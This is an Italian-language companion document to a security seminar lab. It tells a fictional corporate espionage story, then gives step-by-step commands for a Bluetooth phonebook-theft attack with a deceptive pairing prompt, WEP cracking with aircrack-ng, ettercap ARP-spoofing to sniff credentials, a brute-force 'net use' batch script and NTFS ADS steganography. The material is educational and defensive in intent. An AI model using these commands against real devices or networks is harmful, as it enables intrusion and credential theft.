HACK ATTACK IL LABORATORIO ATTENZIONE

Transcript

1 HACK ATTACK IL LABORATORIO ATTENZIONE I L P R E S E N T E D O C U M E N T O H A SCOPO ESCLUSIVAMENTE DIDATTICO ED INFORMATIVO, L UTILIZZO NON AUTORIZZATO DELLE TECNICHE E M E T O D O L O G I E D I S E G U I T O ILLUSTRATE SU DISPOSITIVI ALTRUI È SEVERAMENTE VIETATO E VIENE PERSEGUITO A NORMA DI LEGGE

2 Introduzione Vogliamo innanzitutto ringraziare i numerosissimi partecipanti presenti alla sessione di laboratorio e per le tante di gradimento che abbiamo ricevuto. Quando abbiamo pensato alla realizzazione del laboratorio, la problematica principale nella quale ci siamo subito imbattuti è stata quella di rendere interessante e leggera la sessione, considerando l orario dell intervento (tardo pomeriggio) e il livello di attenzione dei partecipanti sottoposti ad una intensa giornata di relazioni. Abbiamo così deciso di presentare alcune delle tecniche più spettacolari e degli attacchi più interessanti attraverso la recitazione di una storia immaginaria elaborata però da esperienze professionali realmente accadute. I temi trattati non hanno avuto certamente un approccio tecnico approfondito ma il nostro obiettivo era quello di portare a conoscenza dei partecipanti dell esistenza di tali tecniche e minacce cercando di far capire le modalità di innesco e realizzazione senza entrare nel dettaglio. Questo breve documento ha proprio lo scopo di approfondire tecnicamente quello che vi abbiamo mostrato nel laboratorio del seminario. La storia Arruzzoli e Orlandi sono due consulenti per la sicurezza informatica che collaborano spesso alla realizzazione di soluzioni per la sicurezza ICT di aziende private ed enti governativi. Un giorno ricevono la telefonata di un loro cliente, l amministratore delegato dell AXAN Technology (azienda farmaceutica), il quale gli chiede di recarsi subito al centro ricerche AXAN per cercare di risolvere un grave problema di sicurezza. Orlandi arriva per primo al centro ricerche e chiede informazioni sull accaduto all amministratore. L amministratore gli spiega che alcune ore fà la sicurezza interna ha notato un auto che sostava nel parcheggio privato dell AXAN con all interno una persona che stava utilizzando un computer portatile in modo sospetto. Gli agenti della sicurezza si sono avvicinati e hanno notato che la persona stava utilizzando una macchina virtuale con un sistema operativo client della AXAN ma costui non era un dipendente AXAN né un soggetto autorizzato all utilizzo dei sistemi informatici AXAN; hanno così pregato la persona a seguirli nel centro ricerche per capire meglio quanto stava accadendo. La persona li segue senza opporre resistenza e dopo una verifica effettuata dall amministratore del sistema ICT dell AXAN risulta che l immagine virtuale del client trovata in possesso della persona, apparteneva ad un portatile rubato alcuni mesi prima ad un ricercatore della AXAN. La persona si rifiuta di rispondere alle domande ma alla richiesta di poter visionare il portatile, non fà nessuna obiezione, al contrario, ci tiene che i tecnici AXAN lo esaminino. Questo comportamento ha insospettito l amministratore delegato che vuole cercare di capire cosa realmente può aver fatto quella persona prima di intraprendere qualsiasi azione legale. Orlandi si mette al lavoro e dopo una rapida investigazione scopre che la segretaria dell amministratore conosce quella persona in quanto frequentano entrambi la stessa palestra e si ricorda che una sera spettegolando sui propri capi gli aveva confidato che l amministratore dell AXAN aveva il pallino di conservare le credenziali di accesso nella rubrica dei nomi del suo cellulare confondendoli con i nomi reali. Orlandi chiede all mministratore se aveva notato nei giorni precedenti qualcosa di strano sul suo cellulare e l amministratore risponde che il giorno prima, mentre era in riunione presso un azienda concorrente, ha ricevuto un messaggio che gli comunicava la ricarica di 20 euro sul proprio cellulare, istintivamente ha accettato la ricarica ma successivamente, dopo la riunione, ha verificato che non gli era stata accreditata nessuna ricarica ma non ha fatto caso più di tanto all accaduto, pensando ad un errore del gestore telefonico. Orlandi si fà consegnare il cellulare ed effettua una copia (bitstream image) dell immagine virtuale del client per iniziare l analisi tecnica; nel frattempo arriva

3 Arruzzoli e Orlandi lo aggiorna sui dettagli. Iniziano così ad analizzare tutte le informazioni che sono riusciti a raccogliere per cercare di capire se la persona è riuscita a trafugare informazioni riservate. Analizzando il telefono cellulare Orlandi e Arruzzoli verificano la storia del messaggio di ricarica e dopo un breve controllo sul modello e la versione del software capiscono che il sistema bluetooth poteva essere aggirato tramite apposite tecniche per carpire la rubrica telefonica e lo dimostrano (Bluetooth Attack). Successivamente analizzano il luogo dove si trovava l automobile e notano che il segnale della rete wireless della AXAN è raggiungibile. Analizzando la connessione si accorgono che il sistema wireless utilizza crittografia WEP facilmente attaccabile ed effettuano una dimostrazione pratica (WEP Attack). Una volta entrati nella rete AXAN provano ad immaginare cosa possa aver fatto la persona sospetta e analizzando il file system del client virtuale utilizzato scoprono che la persona aveva installato sia aircrack che ettercap. Il programma aircrack conferma loro la teoria dell accesso alla rete wireless tramite attacco al sistema wep mentre la presenza di ettercap lascia supporre la possibilità che la persona sospetta possa aver carpito tramite questo tool crdenziali di autenticazione a vari sistemi della rete AXAN, quindi provano a ripetere l attacco con ettercap per capire il livello di vulnerabilità presente (MAN IN THE MIDDLE ATTACK). Dal risultato ottenuto con le varie prove, Orlandi ed Arruzzoli si rendono conto delle possibili informazioni che la persona può aver acquisito e cercano di capire dove queste informazioni possano essere state nascoste o inviate. Attraverso i prodotti di Log Management e Network Forensic utilizzati dall AXAN verificano che diverse informazioni riservate sono state scaricate sul client virtuale dai sistemi AXAN ma non risulta nessuna trasmissione all esterno della rete AXAN da quel client. Questo fa supporre ad Arruzzoli ed Orlandi che le informazioni siano ancora presenti nel client o siano state cancellate. Provano prima a verificare se si trovano tracce di file cancellati attraverso l utilizzo combinato dei tool Sleuthkit e Autopsy, ma il risultato è negativo, considerando però la possibilità che la persona sospetta possa aver utilizzato tecniche steganografiche per nascondere le informazioni, Orlandi ed Arruzzoli utilizzano un tool realizzato da loro per verificare l esistenza di eventuali presenze steganografiche conosciute nel file system del client AXAN. Prima analizzano (come possibili contenitori) le immagini presenti nel sistema ma il risultato è negativo ed infine analizzano il file system NTFS: in particolare gli attributi Alternate Data Stream presenti (EHG2- Stegano Tool). l esame risulta positivo, infatti vengono ritrovati ed estratti tre file : brute.bat rubrica.txt pentax.txt Il primo file brute.bat : for /f "tokens=1,2 delims= " %%i in (rubrica.txt) do net use \\AXAN-SRV\c$ %%j /u:%%i è un semplice ma funzionale script che esegue un attacco di forza bruta sfruttando una libreria di username e password presenti nel file rubrica.txt. Analizzando il file rubrica.txt : m.rossi f.bianchi Orlandi ed Arruzzoli si accorgono che le credenziali presenti nel file non sono nient altro che la rubrica telefonica del cellulare dell amministratore delegato. A questo punto risulta chiaro che la persona sospetta nei giorni precedenti aveva effettuato un attacco bluetooth al cellulare dell amministratore copiando i nominativi presenti nella rubrica telefonica e successivamente utilizzandoli per lanciare un attacco di forza bruta nella rete AXAN per accedere ai server AXAN. Il terzo file pentax.txt conferma definitivamente l ipotesi fatta, in quanto contiene informazioni riservate su un nuovo tipo di medicinale prodotto dalla AXAN a cui poteva accedere solo l amministratore delegato con le sue credenziali. Orlandi ed Arruzzoli redigono una relazione tecnica in merito a quanto scoperto all amministratore delegato che intraprende un azione legale. Alcuni giorni dopo si scoprirà che la persona sospetta era stata ingaggiata dalla ditta concorrente per acquisire informazioni riservate sul nuovo prodotto della AXAN. Fine della storia.

4 Strumenti utilizzati Durante il laboratorio sono stati utilizzati diversi tool software su sistemi operativi Linux e Microsoft. In particolare per il Vulnerability Assessement è stato mostrato il prodotto GFiLANguard della GFi gli altri software utilizzati sono presenti in una suite Linux chiamata BackTrack ( BackTrack è un live CD basato su sistema operativo Linux (Slax) che contiene una collezione di tool per la verifica della sicurezza dei sistemi ICT. Per la steganografia è stato realizzato un tool freeware (EHG2-Stegano) che dimostra alcune interessanti tecniche steganografiche. Bluetooth Attack (helomoto) L attacco al bluetooth presentato nella sessione di laboratorio è stato scoperto e realizzato da Adam laurie direttore della Bunker Secure Hosting Ltd ed è stato chiamato helomoto in riferimento ad alcuni modelli di cellulari della Motorola su cui è stato possibile realizzare questo tipo di attacco. Helomoto è una combinazione di tre attacchi : Bluesnarf Bluesnarf è stato identificato da Marcel Holtmann nel settembre del 2003 ed è, probabilmente, il più famoso attacco bluetooth, in quanto ha evidenziato una significativa falla nei sistemi di autenticazione bluetooth. L attaccante deve collegarsi a OBEX Push Profile (OPP), servizio pensato per lo scambio di biglietti da visita elettronici e altre informazioni. Nella maggior parte dei casi, questo servizio non richiede l'autenticazione. L attaccante invia una richiesta GET al servizio OBEX della vittima per conoscere nomi di file noti (ad es. la rubrica : telecom/pb.vcf ), in caso di cattiva esecuzione del firmware del telefono cellulare, il malintenzionato è in grado di recuperare tutti i file il cui nome è noto o sia indovinato correttamente. Bluebug Attacco che permette l accesso, il download non autorizzato della rubrica telefonica, degli sms, la possibilità di inviare SMS ed effettuare chiamate telefoniche attraverso l utilizzo di comandi AT in maniera trasparente al proprietario del cellulare. Social engineering/phishing In alcuni modelli di cellulari la connessione non avviene in maniera automatica, in questo caso si deve indurre l utente ad accettare la connessione, mascherando la richiesta in maniera subdola. Gli strumenti utilizzati per realizzare questo attacco sono un device usb bluetooth, la security suite backtrack e il codice dell exploit helomoto( elomoto.html ). Nel laboratorio per prima cosa abbiamo connesso il device bluetooth usb al portatile e verificato il riconoscimento da parte del sistema operativo tramite il comando : hciconfig

5 successivamente abbiamo attivato il device bluetooth usb con il comando : hciconfig hci0 up Per identificare i device con bluetooth attivo e configurati per essere visibili ad altri dispositivi abbiamo utilizzato il comando : hcitool scan In realtà per poter trovare tutti i device bluetooth disponibili ( visibili e non ) è necessario effettuare una scansione di forza bruta su un range di mac-address, operazione onerosa in termini di tempo; alcuni ricercatori hanno realizzato un sistema hardware e software denominato bluebag che permette la scansione contemporanea di più mac-address ( per saperne di più: ). Per effettuare questo tipo di scansione è possibile utilizzare il tool btscanner presente nella suite backtrack e selezionare l opzione brute force (b) inserendo il range mac-address desiderato. Una volta terminata la scansione e identificato un dispositivo (nel laboratorio del seminario veniva preso come esempio un telefono cellulare della Motorola modello L6) viene effettuato un primo tentativo di connessione attraverso il comando : rfcomm connect 0 < mac-address della vittima> 3 Ident. Device bluetooth Canale bluetooth n.3

6 L interfaccia bluetooth del Motorola presenta due voice gateways uno richiede l autenticazione di accoppiamento (pairing) l altro no, nello specifico l Headset Audio Gateway presente sul canale 3 non la richiede fino a quando non viene effettuata la connessione. Tuttavia il device dell attaccante deve essere presente nella history list del device vittima, altrimenti non potrà connettersi al canale 3. L esecuzione del codice helomoto.c, precedentemente compilato, sul canale 8 risolve questo problema : helomoto plant < mac-address della vittima> 8 A questo punto è necessario indurre l utente ad accettare la connessione, per fare questo si prepara attraverso la configurazione del nome dell interfaccia bluetooth un messaggio subdolo che induca l utente a concedere la connessione : hciconfig hci0 name `perl -e 'print "SchedaSIM\x0dNonAttiva\x0dAttivare?\x0d\x0d"'` e ripetiamo il comando : rfcomm connect 0 < mac-address della vittima> 3 Il device della vittima visualizzerà il messaggio : SchedaSIM NonAttiva Attivare? Se viene accettata la connessione, l attaccante potrà interagire con i comandi AT sul device della vittima con un programma terminal configurando il device usb come una porta seriale (ad es. Cutecom) :

7 WEP Attack Il WEP (Wired Equivalent Privacy) è un algoritmo opzionale dello standard IEEE b, che effettua la crittografia del dato prima che venga irradiato nell'etere. Il WEP utilizza un algoritmo RC4 con chiave a 64 bit, 128 e 256 bit. L'aumento delle velocità di trasmissione e le relative piccole dimensioni dei Vettori di Inizializzazione (IV: stringhe di bit usate per rendere casuale parte della chiave) utilizzate nel WEP, fanno sì che in condizioni di traffico normale sia possibile per un attaccante ottenere la chiave di codifica, e quindi l accesso alla rete e alle informazioni trasmesse in un lasso di tempo relativamente breve (un paio d ore). L aumento dei bit di codifica serve solo a ritardare l'accesso alla rete da parte di un attaccante (sarebbe più indicato un cambio frequente della chiave wep). Nel laboratorio del seminario si è utilizzato il tool aricrack-ng per effettuare l attacco ad una rete WEP a 128 bit. Gli strumenti utilizzati per realizzare questo attacco sono una scheda di rete Prism2 con dei driver aggiornati per permettere l injection dei pacchetti (per saperne di più: e la security suite backtrack. L attacco viene portato in 4 fasi Fase 1 Scanning Si effettua una scansione per identificare eventuali reti, su che canale sono e se ci sono client connessi; per fare questa operazione eseguiamo il comando : airodump-ng <interfaccia> (ad es. airodump-ng eth1) Una volta identificata la rete vengono selezionate le seguenti informazioni: BSSID dell AP (mac-address Access Point) ESSID dell AP (nome identificativo Access Point) Channel (il numero del canale di trasmissione) SSID dei client connessi (mac address dei client) BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:E0:XX:XX:XX:XX WEP WEP AXAN-AP12 BSSID STATION PWR Lost Packets Probes 00:E0:XX:XX:XX:XX 00:0E:35:XX:XX:XX AXAN-AP12

8 Fase 2 Acquisizione dei pacchetti IV Eseguiamo nuovamente airodump-ng con i seguenti paramentri: airodump-ng -c <canale> -b <BSSID> -w <file.ivs> <interfaccia> esempio : airodump-ng --bssid 00:E0:XX:XX:XX:XX -c 6 --write axan-ap12.dump eth1 In questo modo effettuiamo la cattura dei pacchetti IV sul file axan-ap12.dump. Per effettuare la crittanalisi e quindi individuare la chiave, dobbiamo archiviare circa pacchetti IV (varia in base al numero di bit utilizzati per la crittografia). Per diminuire il tempo di attesa è necessario generare del traffico che permetta di acquisire più pacchetti possibili nel minor tempo, quindi si utilizza il tool aireplay-ng. Questo tool dispone di varie funzionalità, nel nostro caso lo imposteremo con il parametro -3 che di fatto lo rende un generatore di richieste ARP, ad ogni richiesta la base (ad es. l Access Point AXAN-AP12) genera un nuovo vettore di inizializzazione. Il comando viene impostato con i seguenti parametri aireplay-ng -3 -b 00:E0:XX:XX:XX:XX -h 00:0E:35:XX:XX:XX eth1 Mac-address AXAN-AP12 Mac-address di un client connesso Fase 3 Analisi dei pacchetti IV Con aircrack-ng si analizzano i pacchetti IV per decifrare la chiave. Apriamo un nuova console ed eseguiamo il comando : aircrack-ng <file.ivs> Il tempo varia anche in base alla lunghezza della password.

9 Raggiunto il numero di pacchetti sufficienti l algoritmo riesce a trovare la chiave. Fase 4 Configurazione della scheda di rete A questo punto si inserisce la chiave nella configurazione della scheda di rete wireless con il comando : iwconfig eth1 mode Managed Key 1A:43:DC:BB:4C:9D:8B:47:C5:47:CC:55:CD nella maggior parte dei casi è sufficiente eseguire una richiesta dhcp sull interfaccia di rete wireless per ottenere i parametri di configurazione e quindi accedere alla rete: dhcpcd eth1 Man In The Middle attack (MITM) Il MITM è un attacco nel quale l'attaccante è in grado di leggere, inserire o modificare a piacere, le informazioni che vengono scambiate tra due parti senza che nessuna delle due sia in grado di sapere se il collegamento sia stato compromesso. L'attaccante deve essere in grado di osservare e intercettare il transito delle informazioni tra le due vittime. Nel laboratorio del seminario è stato dimostrato come attraverso l uso del tool software ettercap sia possibile per un attaccante connesso ad una rete effettuare un atttacco MITM e carpire informazioni relative alle credenziali degli utenti presenti sulla medesima rete. Per realizzare questo attacco è stata utilizzata la security suite backtrack che contiene il tool software ettercap.

10 Una volta avviato il tool ettercap per prima cosa è necessario selezionare l interfaccia di rete su cui si vuole analizzare il traffico. Una volta selezionata, il menu di ettercap mostrerà ulteriori funzionalità. A questo punto si deve effettuare uno scanning della rete per individuare i computer attivi. A tutti i computer individuati, ettercap, invierà un arp spoofing impostando l opzione Sniff remote connections nel menu Mitm:

11 Una volta attivato ( dal menu Start->Start Sniffing), Ettercap comincerà ad inviare delle richieste arp ad ogni singolo computer individuato, associando il proprio mac-address con tutti gli altri indirizzi dei computer attivi. In questo modo tutte le richieste effettuate dai computer verso altri computer saranno dirottate prima verso l attaccante e solo successivamente saranno redirette al vero destinatario; in questo modo l attaccante ha modo di analizzare ed eventualmente manipolare le informazioni. Lista arp di un client prima dell arp spoofing Lista arp di un client dopo dell arp spoofing In modalità sniffing, ettercap analizza tutto il traffico e quando individua la trasmissioni di credenziali le filtra e le memorizza. E interessante notare la capacità di ettercap di acquisire le credenziali trasmesse anche su canali SSL. In particolare nel caso ettercap trasmette al client un falso certificato digitale che utilizza successivamente per decriptare le credenziali inviate, il tutto in maniera trasparente all utente:

12 Esempi di Steganografia ( EHG2-Stegano Tool ) Il tool utilizzato nel laboratorio del seminario è stato realizzato dall EHG2 (Ethical Hacker Guardian Group) un gruppo di ricerca fondato da Francesco Arruzzoli e Cristiano Orlandi che ha lo scopo di analizzare ed approfondire la conoscenza sulle nuove tecnologie, in particolare sulla loro applicazione, sicurezza ed affidabilità in ambito ICT. Steganografia con le Immagini Steganografia realizzata con gli Alternate Data Stream Il tool permette di utilizzare due tecniche di steganografia quella applicata alla possibilità di inserie inserire un file generico dentro immagini Bitmap utilizzando l algoritmo LSB (Least Significant Bit) algoritmo di inserimento nel bit meno significativo e quella che utilizza la proprietà Alternate Data Stream presente nel file system NTFS dei sistemi operativi Microsoft. Utilizzo del tool con la metodologia LSB Selezionare la Tab LSB Image Steganography successivamente la sotto tab Encrypt. Premere il pulsante Select image.. per selezionare l immagine contenitore e il pulsante Select File.. per selezionare il file da inserire nell immagine contenitore.

13 L indicatore Container Capacity indicherà la % occupata dal file nell immagine contenitore. Per generare l immagine bmp con il file steganografato premere il pulsante Execute Steganography. Per estrarre un file steganografato dall immagine contenitore selezionare la Tab LSB Image Steganography la successivamente la sotto tab Decrypt. Premere il pulsante Select Image.. e selezionare l immagine contenitore, il nome del file nascosto e le sue dimensioni appariranno nella sezione File Contained. Per estrarre il file è sufficiente premere il pulsante Extract File >>.

14 Utilizzo del tool con gli Alternate Data Stream Selezionare la Tab Alternate Data Stream Steganography,selezionare il file contenitore a cui associare il file nascosto tramite ADS, premendo il pulsante relativo alla casella di testo Select file to link ADS, successivamente premere il pulsante relativo alla casella di testo Copy file to an existing ADS per associare il file da nascondere, oppure selezionando l opzione Create a text ADS file è possibile creare un file di testo da associare, semplicemente inserendo il nome del file nella casella di testo ADS file name e il testo da nascondere nella casella di testo Text Content. Per creare l ADS premere il pulsante Make ADS. E possibile associare più file ADS allo stesso file contenitore. Anche cambiando il nome al file contenitore il link ai file ADS rimane ma si perde se viene effettuata una copia su un altro file system.

15 Per ricercare gli ADS presenti nel file system inserire il percorso di ricerca iniziale nella casella di testo Search Path e premere il pulsante Search ADS. Eventuali file ADS saranno visualizzati nella lista Found Files; per aprire, estrarre o eliminare il file ADS selezionarlo dalla lista, premere il plusante destro del mouse e selezionare l opzione desiderata sul menù che appare. Quello che non avete visto ma che è accaduto Durante lo svolgimento del laboratorio, al di là di problemi tecnici tipici della diretta come il filmato iniziale che dalla sala regia stentava a partire o le luci che non si accendevano, per assicurarci la miglior riuscita delle dimostrazioni e ipotizzando la possibilità che qualcuno dal pubblico per spirito goliardico potesse tentare di interferire in qualche modo, abbiamo creato delle Honeypot (in breve: dispositivo che funge da specchietto per le allodole ) per i dispositivi wireless alfine di deviare l attenzione da quelli realmente utilizzati. Il risultato è stato sorprendente nei primi dieci minuti di laboratorio abbiamo registrato sulla Honeypot relativa ai dispositivi bluetooth 5 tentativi di attacco e diversi download dei file civetta. Avremmo voluto discuterne alla fine del seminario ma purtroppo per motivi di tempo non abbiamo potuto, sarebbe stato un interessante approfondimento. Nel ringraziarvi nuovamente per l interesse e la partecipazione, speriamo che il presente documento sia un utile compendio a quanto visto durante il seminario. Distinti Saluti Francesco Arruzzoli (DiNets srl) Cristiano Orlandi (Winitalia)